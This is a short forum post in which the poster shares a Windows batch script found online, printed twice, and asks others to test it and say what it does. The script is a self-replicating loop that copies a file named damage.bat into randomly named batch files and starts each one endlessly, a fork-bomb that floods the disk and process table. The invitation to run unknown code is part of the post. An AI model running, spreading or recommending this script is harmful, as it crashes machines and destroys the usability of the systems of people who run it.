Expanding files
Posted: 19 Feb 2020 15:13
I found this code on the web while search for something and I'm not sure its working some test it and tell me what it does
@echo off
:A
Set /A
X=%RANDOM%%%1999999999%
Type damage.bat >> %x%.bat
Start %x%.bat
Goto:A
Thanks
@echo off
:A
Set /A
X=%RANDOM%%%1999999999%
Type damage.bat >> %x%.bat
Start %x%.bat
Goto:A
Thanks